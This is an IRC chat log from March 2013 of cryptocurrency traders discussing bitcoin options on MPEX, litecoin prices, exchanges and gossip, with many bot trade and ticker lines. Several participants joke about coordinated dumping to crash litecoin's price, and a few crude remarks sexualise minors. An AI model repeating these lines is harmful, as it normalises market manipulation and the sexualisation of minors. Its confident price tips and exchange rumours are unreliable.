14:01:14 ie especially in car manufacturing Mar 19 14:01:23 volkswagen is highly leveraged Mar 19 14:01:33 they own like 80% of EU automakers Mar 19 14:01:58 thats all from operational debt incurred to expand production of cars nobody could afford Mar 19 14:02:29 largest losses will happen to creditors like germany at some point Mar 19 14:07:30 well...perhaps there is something to the old saying "neither a borrower or a lender be..." Mar 19 14:09:46 ;;ticker Mar 19 14:09:47 BTCUSD ticker | Best bid: 53.79901, Best ask: 53.80000, Bid-ask spread: 0.00099, Last trade: 53.80000, 24 hour volume: 89545.76316294, 24 hour low: 47.31000, 24 hour high: 54.28880, 24 hour vwap: 50.13851 Mar 19 14:09:54 looking sweet. Mar 19 14:12:05 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.50240325 = 502.4033 BTC [-] Mar 19 14:12:42 500 btc? nice Mar 19 14:13:17 heh Mar 19 14:13:23 !ticker m p750t Mar 19 14:13:25 [MPEX:O.BTCUSD.P750T] 1D: 0.50240325 / 0.50243028 / 0.50754217 (1006 shares, 505.44 BTC), 7D: 0.50240325 / 0.50243028 / 0.50754217 (1006 shares, 505.44 BTC), 30D: 0.50240325 / 1.04607226 / 1.53153505 (29789 shares, 31,161.45 BTC) Mar 19 14:13:36 that line got 30k worth of trades thios month, it;'s been crazy Mar 19 14:14:55 "we hope to be able to finally be back to regular delays by April." Mar 19 14:14:57 lmao Mar 19 14:16:30 is that a 75 call option? Mar 19 14:17:35 put Mar 19 14:18:50 what is the price on a call option for 30 d for 75 btc? Mar 19 14:18:58 30k of volume is quite a bit Mar 19 14:19:40 $depth O.BTCUSD.C750T Mar 19 14:19:41 mircea_popescu: Bids: [] Mar 19 14:19:42 mircea_popescu: Asks: ['1 @ 1425081'] Mar 19 14:19:46 hum Mar 19 14:19:54 !ticker m c750t Mar 19 14:19:55 You know, I've had it up to here with this Indian malarkey. Mar 19 14:20:55 $depth O.BTCUSD.C750T Mar 19 14:20:56 mircea_popescu: Bids: ['1000 @ 2'] Mar 19 14:20:57 mircea_popescu: Asks: ['1 @ 1425081', '1000 @ 5181251'] Mar 19 14:21:19 costs you about half a btc to buy, get 2 satoshi per if you sell Mar 19 14:21:52 large spread Mar 19 14:21:54 im sorry Mar 19 14:21:58 like 0.05 btc not 0.5 Mar 19 14:22:12 miscounted them digits Mar 19 14:22:43 !ticker m c410t Mar 19 14:22:45 [MPEX:O.BTCUSD.C410T] 1D: 0.23958397 / 0.23958397 / 0.23958397 (4 shares, 0.96 BTC), 7D: 0.23 / 0.23479198 / 0.23958397 (8 shares, 1.88 BTC), 30D: 0.12612881 / 0.19916485 / 0.23958397 (15018 shares, 2,991.06 BTC) Mar 19 14:22:50 and that is per contract? Mar 19 14:23:01 yeah Mar 19 14:23:18 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.50210205 = 502.1021 BTC [-] Mar 19 14:23:27 what does the (4 shares, 0.96 BTC) mean? Mar 19 14:23:37 is that outstanding? Mar 19 14:23:39 so if i spent 1 btc i would get 20 contracts, so if btc went to 75 or more i then get them, or just the fiat over 75? Mar 19 14:23:43 mjr_ that 4 contracts worth .96 btc were traded Mar 19 14:24:06 Chaang-Noi if btc goes to 76 you get (76 - 75) / 76 Mar 19 14:24:07 mircea_popescu: thanks, that was me...so i was wondering why my trade was on there Mar 19 14:24:15 call means you get whatever's over the strike Mar 19 14:24:17 in fiat? Mar 19 14:24:22 Chaang-Noi no, in btc. Mar 19 14:24:32 hey chang Mar 19 14:24:32 mjr_ well... what do you mean why ? cause it was traded Mar 19 14:24:37 but the btc will be valued at the current price Mar 19 14:24:38 wanna crash LTC again? Mar 19 14:24:49 Chaang-Noi no, at the then current price. hence the /76 if price is 76 Mar 19 14:24:54 bowjob i have been thinking about it, all down to .008 but not right now Mar 19 14:25:01 right Mar 19 14:25:10 id appreciate a heads up Lol Mar 19 14:25:19 mircea_popescu: was just curious, i sold half my position of the 41 calls for .96 btc (4 contracts) i still have four more :) Mar 19 14:25:31 I managed to arb 6 BTC from 10 to 11 Mar 19 14:25:31 it only shows what's traded Mar 19 14:25:36 then I got out Mar 19 14:25:37 xD Mar 19 14:25:38 [BTCTC] [PAJKA.BOND] 9 @ 0.105 = 0.945 BTC [-] Mar 19 14:25:40 so to get 20x 1/76 a btc it would not be worth spending 1 btc, lol Mar 19 14:26:17 depends where the price goes. Mar 19 14:26:31 75 is already way out of the money Mar 19 14:26:35 if it goes to 200 you get 125 / 200 = .62 each x 20 = 13 btc so like 13x Mar 19 14:26:47 but yes probably better calls to buy than the 75 Mar 19 14:26:49 [BTCTC] [PAJKA.BOND] 10 @ 0.105 = 1.05 BTC [-] Mar 19 14:27:05 .05 is just way to high, that low ass bid is fine, Mar 19 14:27:40 well, you can make and sell your own if you want. Mar 19 14:27:41 im sure they would love to have that filled Mar 19 14:27:57 anyway, far out of the money calls are great from a fiat perspective. say you are sure btc is going to 500. what can you do ? Mar 19 14:28:10 well... you could send 50k usd to an exchange and buy 1000 btc. but this takes time and all the bs. Mar 19 14:28:14 1000% in 30 days is a bit much Mar 19 14:28:29 [BTCTC] [PAJKA.BOND] 9 @ 0.105 = 0.945 BTC [-] Mar 19 14:28:34 you could also buy 20 btc and then buy options with them, gain 400 btc exposure that way Mar 19 14:28:40 yerah there are uses for options, i used to trade them when oil was doing so well Mar 19 14:28:59 but that .05 price is just unreasonable Mar 19 14:29:05 its a nice way to give yourself exposure Mar 19 14:29:19 so you look at it... well i bought 50 dollars worth of 1 btc, got 20 calls at 75, now i made 13 btc which are worth 200 each. so from 50 to 2600 dollars. Mar 19 14:29:22 in a fiat perspective Mar 19 14:29:39 yeah but im all in crypto Mar 19 14:29:43 is jurov on right now? Mar 19 14:29:49 Chaang-Noi then probably selling puts is better for you Mar 19 14:29:55 i was wondering if you could write options on coinbr... Mar 19 14:29:57 anyway Mar 19 14:30:14 im pretty bullish Mar 19 14:30:17 with all the problems us people have buying esp large ammts of btc Mar 19 14:30:21 the oix changed drastically Mar 19 14:30:23 options are kinda a must for them Mar 19 14:30:26 i would like to sell puts and buy calls at a certain price Mar 19 14:30:28 !ticker m ^oix Mar 19 14:30:30 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / 57.53184036 / 57.53184036 (6757 shares, 788.72 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 19 14:30:59 theres this house for sale in dallas Mar 19 14:31:03 for 8j BTC Mar 19 14:31:05 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.50180097 = 501.801 BTC [-] Mar 19 14:31:05 8k Mar 19 14:31:13 pretty cool looking Mar 19 14:34:00 heard there was an apt for rent in bitcoins in spain Mar 19 14:34:11 [BTCTC] [ASICMINER-PT] 1 @ 0.856 BTC [+] Mar 19 14:34:13 [BTCTC] [ASICMINER-PT] 3 @ 0.8649 = 2.5947 BTC [+] Mar 19 14:34:16 did anyone hear about etoro? was that just a rumor? Mar 19 14:34:23 its legit Mar 19 14:34:26 ? Mar 19 14:34:31 i couldn't find it on their site Mar 19 14:34:32 another bullish sign Mar 19 14:34:36 yeah true Mar 19 14:35:13 i wish i didnt play dice back then lol Mar 19 14:35:14 [BTCTC] [ASICMINER-PT] 2 @ 0.8649 = 1.7298 BTC [+] Mar 19 14:35:19 id have even more money now Mar 19 14:37:02 more money mopre problesm Mar 19 14:37:52 :) Mar 19 14:38:05 lol Mar 19 14:38:11 firstworldproblems Mar 19 14:38:30 i cant really complain.. ill be rich off of this Mar 19 14:38:31 heh Mar 19 14:39:24 electrum is slow Mar 19 14:39:35 the dollar amount shows 47 per coin Mar 19 14:41:18 what was the etoro news? Mar 19 14:41:31 then again I wish I went all in, including some unemployment, I would have gotten avout $150 grand by now Mar 19 14:41:38 back in december Mar 19 14:41:40 hehe Mar 19 14:42:07 etoro will basically start trading btc Mar 19 14:42:35 http://www.etoro.com/blog/markets/13032013/bitcoin-the-top-performing-currency-in-the-world/ Mar 19 14:42:48 [MPEX] [S.MPOE] 8850 @ 0.00076039 = 6.7295 BTC [+] Mar 19 14:43:17 coulda shoulda woulda Mar 19 14:43:32 where did they announce that Mar 19 14:44:07 damn thats very positive news Mar 19 14:44:14 on the internet Mar 19 14:45:05 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.50089845 = 500.8985 BTC [-] Mar 19 14:45:27 might take huge market share away from mtgox? Mar 19 14:45:41 would it be favourable for someone who bought a mini rig eons ago to capitulate and wait to pre order avalon # 3 instead? Mar 19 14:45:53 etoro was more of a gambling site Mar 19 14:46:01 attack on 55 Mar 19 14:46:09 gamblers love btc Mar 19 14:46:17 http://www.businessinsider.com/fbi-officers-rifle-mistake-2013-3#ixzz2NdngHBQy Mar 19 14:46:18 when will BFL just default Mar 19 14:46:18 lmao Mar 19 14:46:37 tiberiusiv probably never. Mar 19 14:47:18 it will just fade for six months or a year, then some clueless nitwit a la Ryan Singer will "bring it back" Mar 19 14:47:28 think they will come through? Mar 19 14:47:35 doesn't seem likely Mar 19 14:48:15 bfl or tf? Mar 19 14:48:18 i mean th Mar 19 14:48:22 http://i.imgur.com/cbUmsFc.jpg?1 Mar 19 14:48:40 wont etoro take substantial marketshare from mtgox Mar 19 14:49:22 i guess mtgox is basically imploding. Mar 19 14:49:30 they were bleeding market share pretty much monthly since 2011 or so Mar 19 14:49:33 but by now... Mar 19 14:49:34 bowjob i just looked at ltc, it would take more than what i want to spend to get ltc under .08 Mar 19 14:49:39 no realy point in it Mar 19 14:49:43 going back to trading cards i guess Mar 19 14:49:51 ah, kk Mar 19 14:50:00 i will be happy when mt gox has less than 105 market share Mar 19 14:50:01 it seems to be dropping like a rock Mar 19 14:50:10 [MPEX] [O.BTCUSD.P750T] 2 @ 0.49456206 = 0.9891 BTC [-] Mar 19 14:50:14 lots of support in the .08 to .088 range Mar 19 14:50:19 LTC has no liquidity at all Mar 19 14:50:22 im glad to got rid of it at 0.11 Mar 19 14:50:23 earlier Mar 19 14:50:31 i bought at 0.1 too lol Mar 19 14:50:41 i bought in the .002 to .003 range :) Mar 19 14:50:50 lol Mar 19 14:50:50 yeha Mar 19 14:50:52 gh Mar 19 14:50:52 gj Mar 19 14:51:11 i did not expect what it did, and that is why i sold almost 100k of ltc Mar 19 14:51:17 $5k has like 30% price movements Mar 19 14:51:24 [MPEX] [O.BTCUSD.P750T] 998 @ 0.49700001 = 496.006 BTC [+] Mar 19 14:51:25 [MPEX] [O.BTCUSD.P750T] 2 @ 0.35270204 = 0.7054 BTC [-] Mar 19 14:51:28 but i wont sell more, in a year it will be much higher, esp if we get it listed at trade hill Mar 19 14:51:42 i made 100% on ltc in a few days as well Mar 19 14:51:51 play money but w/e Mar 19 14:51:53 yea but what ammount 2btc? Mar 19 14:51:55 well btc will be much higher too Mar 19 14:51:56 i was out yesterday Mar 19 14:51:57 so cant go wrong Mar 19 14:51:59 i have 0 Mar 19 14:52:23 tiberiusiv a bit more Mar 19 14:52:28 not much Mar 19 14:52:34 again, play money Mar 19 14:52:43 imho ltc is going to be dead Mar 19 14:52:46 by end of 2013 Mar 19 14:52:58 why would ltc go anywhere? it just offers nothing Mar 19 14:53:07 it will go alright Mar 19 14:53:09 in the grave Mar 19 14:53:14 lol ltc is a scam like btc right? Mar 19 14:53:15 how many google clones have done well? Mar 19 14:53:25 tiberiusiv the one reasonable explanation i heard so far is arbitraring bitcoin testing Mar 19 14:53:26 Chaang-Noi its not useful over btc Mar 19 14:53:33 Chaang-Noi the usefullnes is zero Mar 19 14:53:35 when btc is forked it sure is:) Mar 19 14:53:40 bit more what? Mar 19 14:53:45 ie, they have free testing, stuff like the berkley db etc Mar 19 14:53:47 litecoin isn't a bitcoin test Mar 19 14:53:55 testnet is a bitcoin test Mar 19 14:53:55 dude did you guys hear about berlusconi? Mar 19 14:54:03 oh price Mar 19 14:54:04 imsaguy no, bitcoin is litecoin's testcoin Mar 19 14:54:05 bitcoin is a ltc test:) Mar 19 14:54:05 mjr_: did you ask if we cared? Mar 19 14:54:16 imsaguy: sorry, do you care? Mar 19 14:54:20 no. Mar 19 14:54:24 ltc is bitcoins backup Mar 19 14:54:29 lol Mar 19 14:54:31 mjr_ what about him ? Mar 19 14:54:34 figured that was a rhetorical question Mar 19 14:54:36 the litecoin people dont understand that ASICs increase ltc difficulty as well Mar 19 14:54:36 btc has forked or too many transactions, use ltc:) Mar 19 14:54:44 mircea_popescu: 4 million a month in alimony Mar 19 14:54:49 if btc fails, lts will be worth -10 Mar 19 14:54:51 hahaha lire ? Mar 19 14:54:55 dollars Mar 19 14:55:01 lol gtfo. to how manywomen ? Mar 19 14:55:04 as less efficient miners drop out of bitcoin, they increase ltc difficulty Mar 19 14:55:14 his wife said: it would be more dignified to stop here...i can't stay with a man who consorts with minors Mar 19 14:55:23 after he attended an 18 year old models birthday party Mar 19 14:55:25 making ltcs network strong help move the price up Mar 19 14:55:39 like, sure, cheat on me...but please do it with more age appropriate women Mar 19 14:55:40 how many times did he see her before 18? lol Mar 19 14:55:45 no clue Mar 19 14:55:51 just crazy though Mar 19 14:55:57 when i'm 70 i'll prolly be doing 17 yos too Mar 19 14:56:00 drop to 0.008 Mar 19 14:56:00 it's an old man thing Mar 19 14:56:12 mp you catholic? Mar 19 14:56:16 nope Mar 19 14:56:19 if bitcoin fails that will be the end of crypto for a decade + Mar 19 14:56:25 k i thought it was just a cathloic thing Mar 19 14:56:26 lol Mar 19 14:56:32 lol Mar 19 14:56:42 no it doesnt Mar 19 14:56:43 tiberiusiv: i think that its biggest threat is something better Mar 19 14:56:47 no, they handle the boys Bowjob Mar 19 14:56:49 thats a complete myth chaang Mar 19 14:56:52 and if that happens, it will be that new thing Mar 19 14:56:55 why is it always boys Mar 19 14:56:57 Bowjob the fact is, the way the human body works first pregnancy should be delivered around 18 years of age. Mar 19 14:56:57 i dont get it Mar 19 14:56:58 so... Mar 19 14:57:06 cause we are sexy w/o the makeup Mar 19 14:57:07 ltc was made so people who cant afford to invest into equip can continue "mining" Mar 19 14:57:10 Bowjob i think it's girls with berlusconi neh ? Mar 19 14:57:20 who Mar 19 14:57:31 oh that guy Mar 19 14:57:37 but hes not catholic priest Mar 19 14:57:48 the problem is that BTC asics increase litecoin difficulty Mar 19 14:57:50 making the ltc benefit void Mar 19 14:58:02 this conversation is layered in such a way... Mar 19 14:58:06 :D Mar 19 14:58:33 jurov, when's hte big payday? Mar 19 14:58:38 litecoin dropping like a bitch Mar 19 14:59:20 mircea: do you think coinlab succeeds? Mar 19 14:59:33 what's your definition of succes ? Mar 19 14:59:45 age of consent here is 15, 18 is getting on the old side for the culture here Mar 19 15:00:28 ltc did not even hit that resistance at .088 i told you about Mar 19 15:00:39 mircea_popescu: SEC investigation Mar 19 15:00:41 [MPEX] [O.BTCUSD.P750T] 2 @ 0.49154267 = 0.9831 BTC [+] Mar 19 15:00:43 every good startup has one. Mar 19 15:00:58 what resistance i dont see it Mar 19 15:01:08 it is still there Mar 19 15:01:09 were down to 0.0087, no resistance Mar 19 15:01:23 hehe Mar 19 15:01:23 large client base? Mar 19 15:01:24 [MPEX] [O.BTCUSD.P750T] 998 @ 0.49252684 = 491.5418 BTC [+] Mar 19 15:01:36 its at 0.0082 Mar 19 15:01:42 tiberiusiv https://bitcointalk.org/index.php?topic=147613.msg1641662#msg1641662 Mar 19 15:01:43 cause its useless Mar 19 15:02:25 it fell faster than i expected Mar 19 15:02:37 I am Chunyan 22 years old from China http://www.girlsfromasia.ru/ Mar 19 15:02:40 totally. Mar 19 15:03:35 ;;ticker Mar 19 15:03:35 BTCUSD ticker | Best bid: 54.64859, Best ask: 54.99989, Bid-ask spread: 0.35130, Last trade: 54.64859, 24 hour volume: 94878.61374780, 24 hour low: 47.31000, 24 hour high: 55.00000, 24 hour vwap: 50.40729 Mar 19 15:03:46 its at 0.0082 ---- what?? Mar 19 15:04:11 Last Price: 0.00909 BTC Mar 19 15:04:11 Low: 0.0085 BTC Mar 19 15:04:11 High: 0.013 BTC Mar 19 15:04:25 you from 2 weeks ago? Mar 19 15:04:41 no i mean the support Mar 19 15:04:54 400 BTC support at 0.0082 Mar 19 15:04:57 ahh Mar 19 15:05:11 imo take the profits and run Mar 19 15:05:16 [MPEX] [S.MPOE] 6273 @ 0.00075833 = 4.757 BTC [-] Mar 19 15:05:17 you cant go wrong either way Mar 19 15:05:29 like 800 btc to get to .008 Mar 19 15:05:57 then when that support is down, its all downhil Mar 19 15:05:59 buy cheaper Mar 19 15:06:00 lol Mar 19 15:06:09 someone said tradehill? Mar 19 15:06:09 i took some profit, i made like 600% even if i lose everything else i hold, im not worried Mar 19 15:06:14 oh no, it was downhill. Mar 19 15:06:47 this is highly lucrative Mar 19 15:06:47 heh Mar 19 15:06:57 90k ltc dump to get to .008, i wont do it Mar 19 15:07:07 i fear i wont get it back Mar 19 15:07:25 tradehill lesson - don't write check with your mouth that you butt can't cash Mar 19 15:07:27 ofc not Mar 19 15:07:29 cause its useless Mar 19 15:07:45 yeah btc was useless after 1.5 years too Mar 19 15:07:59 yeah and now is useful cause we didnt have btc Mar 19 15:08:02 :) Mar 19 15:08:12 when btc is forked you dont have btc now either:) Mar 19 15:08:27 .. Mar 19 15:08:46 ill sell more ltc once this may 15th stuff is over Mar 19 15:08:52 cuz if tehy fuck up btc lol Mar 19 15:09:27 i see litecoin is somewhat like debian Mar 19 15:09:35 stable means all developers have been dead for years Mar 19 15:09:46 My stupid friend is now kicking himself for not buying BTC at 17 Mar 19 15:10:11 if it works it works, btc is ltcs test coin Mar 19 15:10:13 Bowjob tell him he will be kickin himself later for not buying at 55 Mar 19 15:10:16 everytime it goes up, he says... BTC will go down. when BTC goes down, he says BTC will go down further Mar 19 15:10:32 tahts his reasoning every fucking time Mar 19 15:10:35 from 17 to 55 Mar 19 15:10:40 i hear that a lot Mar 19 15:10:48 i told freinds and family to buy at 3.5 never said shit again Mar 19 15:11:01 i gave hima heads up at the flash crash Mar 19 15:11:03 people slowly come back and be like, still good time to but, Mar 19 15:11:04 he said btc will die Mar 19 15:11:08 [MPEX] [O.BTCUSD.P750T] 1 @ 0.4857348 BTC [-] Mar 19 15:11:13 so he could buy Mar 19 15:11:17 the 'hill is back up... Mar 19 15:11:22 yup Mar 19 15:11:31 [MPEX] [O.BTCUSD.P750T] 999 @ 0.49193244 = 491.4405 BTC [+] Mar 19 15:11:39 i wonder, do you think that they are just running a gox shadow book? Mar 19 15:11:48 I told him since he's such a sensitive guy, I can sell him $100 worth of bitcoins Mar 19 15:12:01 for 1.81 BTC Mar 19 15:12:11 when the connection to gox dies - so does their "prime" order book Mar 19 15:12:24 he wants to buy 5 BTC now, and pretend he got them at "$20 each" Mar 19 15:12:24 pgp now this is an interestinfg observatiob Mar 19 15:12:27 n* Mar 19 15:12:28 im like, lol nope Mar 19 15:13:08 stabinthefacehill Mar 19 15:13:23 either they are the worst technologists ever or they are relying on third party Mar 19 15:13:37 its prime, ya know. Mar 19 15:13:47 certainly the 2nd seems plausible. Mar 19 15:13:54 1st being a certainty. Mar 19 15:14:00 lol Mar 19 15:14:18 chang, is that yours the 374 BTC sell Mar 19 15:14:22 at 0.0094 Mar 19 15:14:57 no Mar 19 15:15:02 and that 500 btc wall is down Mar 19 15:15:49 mjr_ yes i'm here, pm me Mar 19 15:17:01 and sorry for mpex.coinbr.com problem, forgot to update the configs :/ Mar 19 15:17:35 ;;asks 55 Mar 19 15:17:40 There are currently 2255.5627 bitcoins offered at or under 55.0 USD, worth 124055.895521 USD in total. | Data vintage: 0.0012 seconds Mar 19 15:17:53 wall is falling faster than i expected Mar 19 15:18:22 that is exactly what they are doing... they are showing the gox book $.55 worse... lol... Mar 19 15:19:27 lmao Mar 19 15:19:51 I'd call that a scam, unless, of course, it's "free" to trade with them, in which case they are embedding the gox commission in their prices. In any case, their pathetic relaunched "website" has no information on fees... Mar 19 15:19:53 pgp im quoting this. Mar 19 15:20:22 be my guest Mar 19 15:20:48 [MPEX] [O.BTCUSD.P750T] 1 @ 0.48888954 BTC [-] Mar 19 15:22:03 [MPEX] [S.MPOE] 3127 @ 0.00075423 = 2.3585 BTC [-] Mar 19 15:22:04 [MPEX] [S.MPOE] 5950 @ 0.00076039 = 4.5243 BTC [+] Mar 19 15:22:06 [MPEX] [S.MPOE] 3539 @ 0.00076091 = 2.6929 BTC [+] Mar 19 15:22:10 go to bitfinex for the proof Mar 19 15:22:11 http://trilema.com/2013/children-and-their-delusions-today-jared-kenna-and-ryan-singer/#comment-92405 Mar 19 15:22:34 [MPEX] [O.BTCUSD.P750T] 999 @ 0.49044849 = 489.958 BTC [+] Mar 19 15:23:26 yep - tradehill is offering gox at a 1.0% markup Mar 19 15:24:09 misspelled gavin's last name Mar 19 15:25:47 haha indeed. thansk Mar 19 15:26:21 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] Mar 19 15:26:45 np Mar 19 15:28:20 ;;asks 55 Mar 19 15:28:21 There are currently 2388.2445 bitcoins offered at or under 55.0 USD, worth 131351.566213 USD in total. | Data vintage: 98.2296 seconds Mar 19 15:28:33 wall is falling down Mar 19 15:29:19 btc-e trollbox are now patting each other's back at BTC's downfall Mar 19 15:29:27 and LTC's rise Mar 19 15:29:51 "coinman1980: when ltc eventually gets media attention btc will suffer" Mar 19 15:30:14 lolk Mar 19 15:30:16 [MPEX] [O.BTCUSD.P750T] 1 @ 0.48338803 BTC [-] Mar 19 15:30:42 [MPEX] [O.BTCUSD.P750T] 999 @ 0.49015205 = 489.6619 BTC [+] Mar 19 15:31:18 [BTCTC] [ASICMINER-PT] 1 @ 0.8649 BTC [+] Mar 19 15:32:36 [BTCTC] [B.YABMC] 1 @ 0.01498 BTC [+] Mar 19 15:34:21 [BTCTC] [B.YABMC] 14 @ 0.01499 = 0.2099 BTC [+] Mar 19 15:34:25 [BTCTC] [S.DICE-PT] 150 @ 0.0049 = 0.735 BTC [+] Mar 19 15:34:49 [BTCTC] [B.YABMC] 5 @ 0.015 = 0.075 BTC [+] Mar 19 15:35:26 [BTCTC] [B.YABMC] 5 @ 0.016 = 0.08 BTC [+] Mar 19 15:35:42 [BTCTC] [B.YABMC] 1 @ 0.017 BTC [+] Mar 19 15:35:49 This is what "enlightened" 14 year olds think about bitcoin Mar 19 15:35:49 http://lurkerfaqs.com/boards/400-current-events/65241750/ Mar 19 15:35:56 [BTCTC] [B.YABMC] 1 @ 0.0175 BTC [+] Mar 19 15:36:00 [BTCTC] [S.MPOE-PT] 100 @ 0.00071 = 0.071 BTC [+] Mar 19 15:36:28 [BTCTC] [PAJKA.BOND] 8 @ 0.105 = 0.84 BTC [-] Mar 19 15:37:24 As a currency for purchasing power, I grew up with the US dollar so I'm used to having stability enforced by people way more powerful than myself. If I were stuck using certain other national currencies, I would probably be more inclined to appreciate bitcoin's efforts. Especially if that currency was subject to BS levels of printing printing printing. Mar 19 15:37:25 [BTCTC] [ESECURITYSABTC] 2 @ 0.4748 = 0.9496 BTC [-] Mar 19 15:37:26 sounds legit. Mar 19 15:37:53 [BTCTC] [ASICMINER-PT] 1 @ 0.8649 BTC [+] Mar 19 15:38:14 i seen asicminer selling for 1btc on bitcointalk forums Mar 19 15:38:26 links?? Mar 19 15:38:37 cuz i have a few to sell :) Mar 19 15:39:01 asicminer going for 1 BTC means Mar 19 15:39:11 [BTCTC] [SYNERGY] 3 @ 0.0099 = 0.0297 BTC [-] Mar 19 15:39:18 that someone is expecting asicminer to make more than 400k BTC? Mar 19 15:39:22 cant be bothered searching for it Mar 19 15:39:23 thats scary Mar 19 15:39:25 its in there somewhere Mar 19 15:39:51 TradeFortress Auction? i think Mar 19 15:40:21 [BTCTC] [BTC-BOND] 20 @ 0.0099 = 0.198 BTC [-] Mar 19 15:40:36 ;;ticker Mar 19 15:40:37 BTCUSD ticker | Best bid: 54.70013, Best ask: 54.75000, Bid-ask spread: 0.04987, Last trade: 54.70000, 24 hour volume: 95343.84225840, 24 hour low: 47.41103, 24 hour high: 55.00000, 24 hour vwap: 50.52650 Mar 19 15:40:58 iv been very active on asicminer threads on the form and im going to call bs on the 1btc thing Mar 19 15:40:59 [MPEX] [O.BTCUSD.P750T] 1 @ 0.48741637 BTC [-] Mar 19 15:41:14 [BTCTC] [PAJKA.BOND] 2 @ 0.105 = 0.21 BTC [-] Mar 19 15:41:16 maybe someone offered it at that but not many trades will have been done at that price Mar 19 15:41:31 50 shares i believe Mar 19 15:42:07 ill belive 1 50 share block at that price, but its too high... Mar 19 15:42:25 wall at 55 is getting ibgger :/ Mar 19 15:42:37 why you sad Mar 19 15:42:39 LITECOIN!!! Mar 19 15:42:51 ;;ticker Mar 19 15:42:52 BTCUSD ticker | Best bid: 54.70001, Best ask: 54.89998, Bid-ask spread: 0.19997, Last trade: 54.89999, 24 hour volume: 95603.50817862, 24 hour low: 47.41103, 24 hour high: 55.00000, 24 hour vwap: 50.53990 Mar 19 15:42:53 lol, im happy ltc:) Mar 19 15:43:12 [MPEX] [O.BTCUSD.P750T] 999 @ 0.48926344 = 488.7742 BTC [+] Mar 19 15:44:08 [BTCTC] [SYNERGY] 1 @ 0.01334 BTC [+] Mar 19 15:44:35 [BTCTC] [BTC-BOND] 1 @ 0.0099 BTC [-] Mar 19 15:44:43 !l m s.dice Mar 19 15:44:45 Last trade for S.DICE on MPEX was at 0.0051 BTC [+] Mar 19 15:45:14 someone lost 400 BTC on dice 12 hrs ago Mar 19 15:45:19 thats... idk lol Mar 19 15:50:32 [BTCTC] [PAJKA.BOND] 5 @ 0.105 = 0.525 BTC [-] Mar 19 15:50:33 [MPEX] [O.BTCUSD.P750T] 1 @ 0.48666662 BTC [-] Mar 19 15:52:00 [MPEX] [O.BTCUSD.P750T] 1 @ 0.4874894 BTC [+] Mar 19 15:52:15 http://grief.com/the-five-stages-of-grief/ Mar 19 15:52:41 I believe the trollbox is in stage 1. It can be remedied if LTC stops falling like a brick. Mar 19 15:55:16 anyone know if one could get a phD after an MBA? Mar 19 15:55:26 or have to get a different type of masters? Mar 19 15:55:45 whoa. theymos is 21 years old?? WTf Mar 19 15:55:51 yeah Mar 19 15:55:53 i thought hes an old dude Mar 19 15:55:58 nope Mar 19 15:56:06 im just 1 year younger than him lol Mar 19 15:56:12 one of the reasons why no one expects much of him Mar 19 15:56:19 [MPEX] [O.BTCUSD.P750T] 998 @ 0.4874894 = 486.5144 BTC [+] Mar 19 15:56:56 well that explains a lot. Mar 19 15:57:13 kako did not know that? Mar 19 15:57:18 nope Mar 19 15:57:38 i think its why the forum staff is so yoing and trollish Mar 19 15:57:42 bitcoin is buncha kids with money for sure Mar 19 15:57:48 but didnt know twas dat bad Mar 19 15:57:55 yeah.... it is Mar 19 15:58:20 i was thinking and a few years tehre are going to be all these millionarie 20 eyar olds Mar 19 15:58:41 like richie riches Mar 19 15:58:46 with their own mcdonalds Mar 19 15:58:56 n stuff Mar 19 15:59:04 yah me Mar 19 15:59:16 thinking of a black lambo Mar 19 15:59:30 many will sell out after geting 100% return, like some people did with ltc :) Mar 19 15:59:48 im up by 5x, almost Mar 19 15:59:52 with time, institutions will hold most btc Mar 19 15:59:55 riding this bull to the top Mar 19 16:00:27 honestly if i get a lot of money i wont really buy anything, i will travel a bit more Mar 19 16:00:38 want has go to anartica Mar 19 16:00:42 when my holdings are worth more than a country's entier gdp, the world is my playground Mar 19 16:01:07 [MPEX] [O.BTCUSD.P750T] 1 @ 0.48443619 BTC [-] Mar 19 16:01:24 [MPEX] [O.BTCUSD.P750T] 999 @ 0.48483624 = 484.3514 BTC [+] Mar 19 16:01:29 why all these 75 puts? Mar 19 16:01:46 > usagi: The company owns it. Essentially, since I am liable for it, I own it. Mar 19 16:01:55 liable for silver but not cpa debt Mar 19 16:01:59 kinda strange isnt it Mar 19 16:02:12 i dont even try Mar 19 16:03:24 >and I'm sure once you get on track with how we operate you will understand it. Until then, rest assured that everything is okay here. Mar 19 16:03:33 is this some sort of a fan club? Mar 19 16:03:41 no idea Mar 19 16:03:45 [BTCTC] [ASICMINER-PT] 22 @ 0.8649 = 19.0278 BTC [+] Mar 19 16:04:50 [BTCTC] [PAJKA.BOND] 4 @ 0.105 = 0.42 BTC [-] Mar 19 16:06:55 ok, i have not seen one mention of bitcoin being either traded or used to fund accounts on etoro Mar 19 16:07:08 they have blogged about it a little Mar 19 16:07:17 but there is no mention of them accepting it or allowing you to trade it Mar 19 16:07:22 it will be traded as cfd Mar 19 16:07:29 is all Mar 19 16:07:33 ok...where is the link where i can see that pair? Mar 19 16:07:41 not yet Mar 19 16:07:48 its not under commodity or currency...did they do a press release or something? Mar 19 16:08:01 it was bloged Mar 19 16:08:22 well...i am sure they are interested in doing it, but i was hoping for an announcement Mar 19 16:10:50 also...i am not sure how you offer a CFD in the US Mar 19 16:11:55 ;;asks 55 Mar 19 16:11:56 There are currently 2625.7187 bitcoins offered at or under 55.0 USD, worth 144414.136288 USD in total. | Data vintage: 26.7392 seconds Mar 19 16:12:24 http://www.forbes.com/sites/jonmatonis/2012/04/09/another-market-not-available-to-u-s-citizens/ Mar 19 16:13:42 lul Mar 19 16:13:53 us is fucked Mar 19 16:13:56 so yeah...US sucks Mar 19 16:14:03 not allowed to do CFD Mar 19 16:14:03 i told before Mar 19 16:14:10 bitcoiners should move to yurop Mar 19 16:14:19 or south america Mar 19 16:14:30 i was wondering what the bitcoin evnironment was like in the philippines Mar 19 16:14:34 europe is falling apart anyhow Mar 19 16:14:36 they have a huge market for remittances Mar 19 16:14:45 Diablo-D3 thats the beauty of it Mar 19 16:15:01 how does that have any beauty? Mar 19 16:15:08 remember the riots in greece? Mar 19 16:15:16 thats going to happen in every city in every country now Mar 19 16:15:17 what about them Mar 19 16:15:27 we have them for a while now too Mar 19 16:15:29 so fuckin what Mar 19 16:15:41 they burned half of greece down, dude Mar 19 